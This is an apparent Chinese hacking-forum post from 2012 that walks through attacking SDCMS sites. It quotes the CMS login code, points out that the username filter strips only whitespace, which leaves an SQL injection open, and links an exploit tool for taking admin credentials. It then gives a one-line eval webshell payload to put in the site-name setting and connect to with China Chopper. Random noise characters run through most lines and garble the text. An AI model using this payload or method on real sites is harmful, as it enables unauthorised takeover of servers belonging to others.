作者:T00LS 鬼哥2 J8 n4 ^$ h+ j: F( r
漏洞文件:后台目录/index.asp
# k8 C% o5 G$ s! T8 j" Z. j; j; \3 v5 ?
Sub Check
, e/ W# q. P% N) g" O$ z- q Dim username,password,code,getcode,Rs7 \( t1 X( q( B9 p& R
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
' Q$ Y% d! s5 n% Y6 p- n username=FilterText(Trim(Request.Form("username")),1)
/ S3 ^8 Z& _3 C( T password=FilterText(Trim(Request.Form("password")),1)9 m0 e, A7 p! S) }0 J$ B$ S
code=Trim(Request.Form("yzm"))
: N3 I5 i( N: A0 ?3 e getcode=Session("SDCMSCode")
9 o \; W! T7 B y$ T IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
* i9 G8 L- f* o2 r0 k8 e6 i9 ^0 f IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
# y/ j y$ h: i( m IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
$ t* H' g' T6 ^# `+ i& I3 A IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied T" n% s: a2 T8 I
IF username="" or password="" Then
# \ p" d: @8 c Echo "用户名或密码不能为空"ied
- v) \) v* J( y/ v+ P9 K8 x" K2 C, n Else
) c7 }. N8 N# X1 e% J& e Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")9 a; ^/ z \1 q0 W* y8 W# \& ^
IF Rs.Eof Then; K+ d5 g" N) z) G" R
AddLog username,GetIp,"登录失败",1 O+ j! z1 n! b0 O1 X! |
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
& D* d/ h J9 b. W Else
8 _% \9 M. D6 f! b) ? Add_Cookies "sdcms_id",Rs(0)" C4 B8 u9 g& Q3 K( {
Add_Cookies "sdcms_name",username
: y. M/ S9 O1 T Add_Cookies "sdcms_pwd",Rs(2)
3 y, k: _3 D3 H. w( V# S4 A$ T Add_Cookies "sdcms_admin",Rs(3)) C0 [3 R2 w' G$ A# Q$ A6 Q% Z( Y( v
Add_Cookies "sdcms_alllever",Rs(4)0 c' y1 I6 n* K" _
Add_Cookies "sdcms_infolever",Rs(5)
* |, w+ V: n8 a6 r Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")8 d6 K) w+ H7 _. b `
AddLog username,GetIp,"登录成功",1
" p- K ]# ?# c g5 l* e( s '自动删除30天前的Log记录) m0 N+ o! Y' u& D C2 O- ]& }( g8 R, ?
IF Sdcms_DataType Then
0 M7 C( |) w4 }, F7 i Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
5 c* W- P! e4 ]7 \# z Else
' ^0 `3 v# i! Z( S, k Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
" ?+ ~! U' b- Q: }( V* W* s+ f End IF
0 f, O( w7 `& `: X, u Go("sdcms_index.asp")% W+ X* k" l a0 \$ ^
End IF
2 q" }; w" R# h Rs.Close
4 R7 F) g- `' W0 ^ o Set Rs=Nothing! u/ d6 ^. d; K4 S) Y- n
End IF
3 A$ t9 C6 j# T' |) t# I5 L1 Y$ m8 CEnd Sub
9 u! F: ^% g) @% }! y4 U6 @ t5 O0 L8 \; o0 H0 G+ N) P
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
4 o/ O& p' Q2 Y# ]" E
7 E0 O4 S& {! R: t2 aFunction FilterText(ByVal t0,ByVal t1)1 x2 b: e' `0 ^9 @
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function/ K- q, O+ }# N6 U) C
t0=Trim(t0)/ `1 @/ V) r( B' J
Select Case t1
" h2 b5 U9 r8 y4 | Case "1"* K6 N3 v1 W2 |! K; d: w
t0=Replace(t0,Chr(32),"")
$ p* B4 H3 z( z. K% H& B t0=Replace(t0,Chr(13),"")
7 U- b8 C) ?/ f2 [# }6 V/ A6 u# p t0=Replace(t0,Chr(10)&Chr(10),"")# p7 _: t1 L5 v3 D
t0=Replace(t0,Chr(10),"")
4 v: \, j* B/ { n+ c Case "2"
( N8 k% [ I/ L0 S2 f t0=Replace(t0,Chr(8),"")'回格
( {2 u, x! M5 i7 P" G t0=Replace(t0,Chr(9),"")'tab(水平制表符), ~& G" L$ ~: z6 w; _/ }
t0=Replace(t0,Chr(10),"")'换行
% v6 h( L) t! |- q- Z) G. @ t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
1 U! s, n3 J4 ^1 W. [+ z t0=Replace(t0,Chr(12),"")'换页
3 U+ o: b: o0 N5 n$ N# n: q t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合" Q8 l6 o8 ?6 P; ]- p1 V4 y
t0=Replace(t0,Chr(22),"")
9 P/ D) z- A. ?! U& j2 X, k t0=Replace(t0,Chr(32),"")'空格 SPACE3 e7 E# t, V4 y4 f6 `/ ]
t0=Replace(t0,Chr(33),"")'!
7 v8 f0 B, G# f! m/ S% J3 e t0=Replace(t0,Chr(34),"")'" |4 l2 g7 f i4 y! V
t0=Replace(t0,Chr(35),"")'#% _ y) \4 j$ K( x
t0=Replace(t0,Chr(36),"")'$- q4 W( ~' l$ i' O
t0=Replace(t0,Chr(37),"")'%
H8 K" K B, W t0=Replace(t0,Chr(38),"")'&$ ], R7 k C/ S) u( b' u1 D' ^' ?
t0=Replace(t0,Chr(39),"")''8 k4 X/ V* }* v: P }
t0=Replace(t0,Chr(40),"")'(* L, I' ^0 g; {* ?
t0=Replace(t0,Chr(41),"")')
# c( X; a1 r7 M( r. ~$ [ t0=Replace(t0,Chr(42),"")'*
) B C6 {2 N3 h, m* _ t0=Replace(t0,Chr(43),"")'+
4 Z- I& P3 L/ u( H b4 d t0=Replace(t0,Chr(44),"")',% l- m; d0 i/ c& `/ G: W+ `1 U
t0=Replace(t0,Chr(45),"")'-
, i; q$ i/ r2 W$ b3 p" E( W0 O' h t0=Replace(t0,Chr(46),"")'.
& @: v0 }& r1 `# h Z e$ ^$ m$ B$ Q t0=Replace(t0,Chr(47),"")'/1 \& ~& r+ E" L, @9 [ [0 M, ]
t0=Replace(t0,Chr(58),"")':
1 z& F/ y' S4 I% L' U, x* _ t0=Replace(t0,Chr(59),"")';) a; s o. P8 n) O% I( u
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
; M! b" J# ?$ `5 x6 k( _' v t0=Replace(t0,Chr(63),"")'?+ \0 H% l& M( t2 [& I/ F
t0=Replace(t0,Chr(64),"")'@
}: K5 I6 p/ m) F) h: r6 ]& F t0=Replace(t0,Chr(91),"")'\$ Z0 n" }+ g$ q
t0=Replace(t0,Chr(92),"")'\
% M; p2 Y% I( f z0 I t0=Replace(t0,Chr(93),"")']
' Y1 V6 }6 s- l3 k, A t0=Replace(t0,Chr(94),"")'^
) p0 S" p# g6 r t0=Replace(t0,Chr(95),"")'_
7 K( {; x# n0 k t0=Replace(t0,Chr(96),"")'`; k: Y, v0 `3 y1 Y5 i, L
t0=Replace(t0,Chr(123),"")'{
; w% ]% i/ Z [6 `# j. Z& } f9 T$ y t0=Replace(t0,Chr(124),"")'|
( N: O& g# p$ e" Y, @ t0=Replace(t0,Chr(125),"")'}
) \/ O: i; R3 a* l' o& z1 t t0=Replace(t0,Chr(126),"")'~
2 i# X: f9 e, ]0 ^( O) c+ z5 z+ H. C: E Case Else6 p$ a4 {, b% e' s
t0=Replace(t0, "&", "&")
7 `( G: z( H- G8 } t0=Replace(t0, "'", "'")7 s3 T" t0 q% V& s
t0=Replace(t0, """", """)
0 L3 I5 C- y3 o, \6 A7 ~ t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")# @& x# G7 v5 b6 ]( z) k
End Select
5 q: x3 S7 Y. `7 \4 ^: s IF Instr(Lcase(t0),"expression")>0 Then$ ^/ i, Y: H+ O' F. S" {
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)/ S9 {" V" a0 H8 r
End If
4 T; u# U/ d( y! ]7 v. T8 Y FilterText=t0
: y$ n/ L$ J! {; CEnd Function
: E! K% y* T* [( f9 m+ {& r/ J3 M0 E7 w* i7 c+ |
看到没。直接参数是1 只过滤
3 e% a. i1 L% @2 _2 C t0=Replace(t0,Chr(32)," ")
2 \4 r/ O- v- i6 u7 d t0=Replace(t0,Chr(13),"")5 M* a+ \3 ~: Y( `- a9 ~
t0=Replace(t0,Chr(10)&Chr(10),"* R- B1 j& r9 @
"). O9 A7 ~3 {4 P' G1 A" w
t0=Replace(t0,Chr(10),"+ n- s! ?) P# n6 @1 R7 y
")# V% @. X6 x3 ]+ P" V: A
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!5 }+ [+ x0 O" o# o6 s- x% Y
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
$ @4 }# g# r7 }1 V/ w3 V! ?$ W
1 V7 u9 q" y( g( Q: E测试:
; d# J( n* G# t8 q% d" e- e9 Q. I5 a# Q4 F; V5 y; f
- B D! e9 [" U4 c
现在输入工具上验证码,然后点OK
* x" O) I K. q; [( a: U/ B4 ]1 A8 K V0 y- v2 P
5 u3 y g' j+ v- _
看到我们直接进入后台管理界面了,呵呵!, J4 K6 j3 N* l3 b% Y$ }; A2 M
3 d8 ~( B8 R n3 r R3 D1 W% _2 D" L
, b6 V& d! J0 X9 Q- m. d1 r8 [; y) m) ?
这样直接进入后台了。。。。* I7 R% k/ O8 g- x L
+ g! X+ Z5 |& c! `4 Z
' W0 z$ Z! I% q/ z) z- [% ]4 \
: i; E$ a0 N2 l. U. L) W6 hSDCMS提权:
" k1 S0 p& h6 \
! N& D- O* c7 k# o- A7 o方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?# I5 H8 L5 N5 F- m, A8 T1 u' a4 a
3 Q( {& e3 b' b: p+ S
3 R( T0 `8 y: x% p; x8 ]
z" V* d1 ~8 y( K
OK,现在用菜刀连接下!( v% {6 B& j$ {
" U, e, _) x2 L c9 j7 _8 ~& g
7 G2 I7 p% o8 r) K2 d# Q0 U
( r9 A) L! ?' [( P4 w
! D, X; D, \3 S: i! `2 d
2 I5 f& J/ I) o* H) a" U1 I |
发表于 2012-11-9 20:57:02
收藏
支持
反对